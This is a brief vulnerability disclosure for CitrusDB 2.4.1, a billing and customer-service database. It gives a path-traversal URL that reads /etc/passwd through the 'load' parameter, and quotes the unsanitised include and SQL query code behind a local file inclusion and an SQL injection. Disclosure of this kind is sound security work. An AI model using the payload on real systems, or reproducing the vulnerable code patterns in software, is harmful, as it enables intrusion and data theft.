CitrusDB 2.4.1 - LFI/SQLi Vulnerability



CitrusDB 2.4.1 - LFI/SQLi Vulnerability
Author: Michal `wacky` Blaszczak
WWW: blaszczakm.blogspot.com


CitrusDB is an open source customer service and billing database.
It can be used by customer service personnel to provide sales and support to customers,
and by billing staff to bill customers for their services via invoices and credit card batches.
Customers may access the Online customer account manager to view their services, billing history,
and make service and support requests online.

1) LFI
http://192.168.51.8/lab/citrus-2.4.1/index.php?load=../../../../../etc/passwd%00&type=base

index.php:315

$filepath = "$path_to_citrus/$load.php";
if (file_exists($filepath)) {
include('./'.$load.'.php');


2) SQL INJECTION

include/user.class.php:134

$sql="SELECT password FROM user WHERE username='$user_name' LIMIT 1";



Relevant Pages

  • Re: General question on charging for data access
    ... >>metric for value received by a customer. ... >Connection time no longer provides a good metric, ... Consider a charge per query or a charge per unit of data. ... billing process by ...
    (comp.lang.php)
  • Re: Help with Design
    ... It's not Paradox that isn't following the conventions - it is the original ... Congratulations for convincing your customer to allow you a redesign! ... something (NOT the billing code)? ...
    (microsoft.public.access.tablesdbdesign)
  • Re: Help with Design
    ... In the report, the subassemblies can be grouped by sub field, but I ... I have a customer who has been using Paradox and they have requested that I ... These names are associated directly with billing codes ...
    (microsoft.public.access.tablesdbdesign)
  • Help with Design
    ... I have a customer who has been using Paradox and they have requested that I ... These names are associated directly with billing codes ... requests, I consolidated all the tables into one table provided filtered ...
    (microsoft.public.access.tablesdbdesign)
  • Re: Need help setting up a Parent form with three subforms
    ... you should have additional tables if you are going to include inventory control... ... (customer name, customer address)" ... For instance, a company may have two addresses -- ie, for billing and shipping. ... I am assuming this is your Quotes table ...
    (microsoft.public.access.forms)